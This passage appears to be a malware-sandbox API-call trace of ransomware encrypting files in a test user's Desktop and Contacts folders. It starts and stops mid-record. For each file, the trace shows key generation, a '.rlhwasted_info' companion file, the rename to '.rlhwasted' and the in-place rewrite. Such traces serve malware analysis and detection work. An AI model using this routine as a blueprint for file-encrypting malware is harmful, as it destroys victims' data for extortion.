_aulldvrm () returned 0x0 [0186.624] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0186.625] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.626] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.626] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0186.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0186.626] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.626] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0186.627] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.627] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.627] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.629] SetEndOfFile (hFile=0x124) returned 1 [0186.629] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.629] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.629] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.rlhwasted")) returned 1 [0186.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0186.663] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0186.663] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x496 [0186.663] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x496) returned 0xb00000 [0186.663] CloseHandle (hObject=0x108) returned 1 [0186.693] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0186.694] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.694] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.694] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0186.695] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.695] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.707] SetEndOfFile (hFile=0x124) returned 1 [0186.710] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.710] CloseHandle (hObject=0x124) returned 1 [0186.713] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0186.713] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8b48 | out: hHeap=0x6b0000) returned 1 [0186.713] _aulldvrm () returned 0x0 [0186.713] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0186.714] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.714] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.714] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Lzmr6ElyVMs_z7ML.wav") returned 63 [0186.715] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6e8978 [0186.715] lstrcpyW (in: lpString1=0x6e89f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.715] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.715] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0186.716] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.716] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Lzmr6ElyVMs_z7ML.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-lzmr6elyvms_z7ml.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.717] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.718] SetEndOfFile (hFile=0x124) returned 1 [0186.718] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.718] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.718] lstrcpyW (in: lpString1=0x6e89f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Lzmr6ElyVMs_z7ML.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-lzmr6elyvms_z7ml.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Lzmr6ElyVMs_z7ML.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-lzmr6elyvms_z7ml.wav.rlhwasted")) returned 1 [0186.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Lzmr6ElyVMs_z7ML.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-lzmr6elyvms_z7ml.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0186.719] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0186.719] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x173f7 [0186.719] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x173f7) returned 0xb00000 [0186.720] CloseHandle (hObject=0x110) returned 1 [0186.762] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0186.763] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.763] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.763] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0186.764] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.764] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.775] SetEndOfFile (hFile=0x124) returned 1 [0186.779] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.779] CloseHandle (hObject=0x124) returned 1 [0186.784] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0186.784] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8d08 | out: hHeap=0x6b0000) returned 1 [0186.785] _aulldvrm () returned 0x0 [0186.785] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0186.786] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.786] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hUcsRS_SW.ots") returned 56 [0186.786] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6e8978 [0186.786] lstrcpyW (in: lpString1=0x6e89e8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.786] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.786] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0186.787] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.787] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hUcsRS_SW.ots.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hucsrs_sw.ots.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.836] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.838] SetEndOfFile (hFile=0x124) returned 1 [0186.839] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.839] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.839] lstrcpyW (in: lpString1=0x6e89e8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hUcsRS_SW.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hucsrs_sw.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hUcsRS_SW.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hucsrs_sw.ots.rlhwasted")) returned 1 [0186.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1hUcsRS_SW.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1hucsrs_sw.ots.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0186.841] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0186.841] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x17aa7 [0186.841] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17aa7) returned 0xb00000 [0186.841] CloseHandle (hObject=0x108) returned 1 [0186.852] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0186.853] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.853] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.854] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0186.854] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.854] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.900] SetEndOfFile (hFile=0x124) returned 1 [0186.903] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0186.903] CloseHandle (hObject=0x124) returned 1 [0186.908] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0186.908] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef580 | out: hHeap=0x6b0000) returned 1 [0186.909] _aulldvrm () returned 0x0 [0186.909] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0186.910] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.910] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.910] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6SlCqODMR.wav") returned 55 [0186.910] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6ef298 [0186.910] lstrcpyW (in: lpString1=0x6ef306, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.910] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0186.910] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0186.911] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0186.911] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6SlCqODMR.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6slcqodmr.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.912] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.913] SetEndOfFile (hFile=0x124) returned 1 [0186.914] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.914] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0186.914] lstrcpyW (in: lpString1=0x6ef306, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6SlCqODMR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6slcqodmr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6SlCqODMR.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6slcqodmr.wav.rlhwasted")) returned 1 [0186.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6SlCqODMR.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6slcqodmr.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0186.915] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0186.915] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xb61d [0186.915] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb61d) returned 0x6a0000 [0186.915] CloseHandle (hObject=0x108) returned 1 [0186.919] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0186.920] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.920] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.920] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0186.921] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.921] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.969] SetEndOfFile (hFile=0x124) returned 1 [0186.972] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0186.972] CloseHandle (hObject=0x124) returned 1 [0186.974] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0186.974] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efcf0 | out: hHeap=0x6b0000) returned 1 [0186.974] _aulldvrm () returned 0x0 [0186.974] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0186.975] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.975] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.975] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\89R23NxICZr0H.bmp") returned 59 [0186.976] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6ee458 [0186.976] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.976] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0186.976] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0186.977] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0186.977] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\89R23NxICZr0H.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\89r23nxiczr0h.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.978] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.979] SetEndOfFile (hFile=0x124) returned 1 [0186.979] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.979] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0186.979] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\89R23NxICZr0H.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\89r23nxiczr0h.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\89R23NxICZr0H.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\89r23nxiczr0h.bmp.rlhwasted")) returned 1 [0186.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\89R23NxICZr0H.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\89r23nxiczr0h.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0186.980] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0186.981] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x619b [0186.981] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x619b) returned 0x6a0000 [0186.981] CloseHandle (hObject=0x108) returned 1 [0186.987] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0186.988] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.988] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.988] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0186.989] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.989] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.004] SetEndOfFile (hFile=0x124) returned 1 [0187.007] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0187.042] CloseHandle (hObject=0x124) returned 1 [0187.044] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.044] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef720 | out: hHeap=0x6b0000) returned 1 [0187.045] _aulldvrm () returned 0x0 [0187.045] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0187.046] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.046] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HcQG.jpg") returned 50 [0187.046] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26e) returned 0x6ee458 [0187.046] lstrcpyW (in: lpString1=0x6ee4bc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.046] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0187.046] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0187.047] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0187.047] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 